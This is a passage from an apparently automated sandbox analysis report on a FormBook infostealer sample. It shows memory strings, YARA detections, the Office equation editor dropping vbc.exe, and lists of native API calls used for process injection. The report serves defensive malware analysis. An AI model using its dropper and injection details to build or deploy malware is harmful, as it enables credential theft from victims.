          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2181679428.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000002.2375810590.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_004054B2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]Jump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181C0 NtCreateFile,5_2_004181C0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418270 NtReadFile,5_2_00418270
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182F0 NtClose,5_2_004182F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,5_2_004183A0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041817A NtCreateFile,5_2_0041817A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181BA NtCreateFile,5_2_004181BA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041826A NtReadFile,5_2_0041826A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D00C4 NtCreateFile,LdrInitializeThunk,5_2_008D00C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_008D0048
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0078 NtResumeThread,LdrInitializeThunk,5_2_008D0078
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D07AC NtCreateMutant,LdrInitializeThunk,5_2_008D07AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF9F0 NtClose,LdrInitializeThunk,5_2_008CF9F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF900 NtReadFile,LdrInitializeThunk,5_2_008CF900
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_008CFAD0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_008CFAE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_008CFBB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_008CFB68
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_008CFC90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC60 NtMapViewOfSection,LdrInitializeThunk,5_2_008CFC60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFD8C NtDelayExecution,LdrInitializeThunk,5_2_008CFD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_008CFDC0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_008CFEA0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_008CFED0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFFB4 NtCreateSection,LdrInitializeThunk,5_2_008CFFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D10D0 NtOpenProcessToken,5_2_008D10D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0060 NtQuerySection,5_2_008D0060
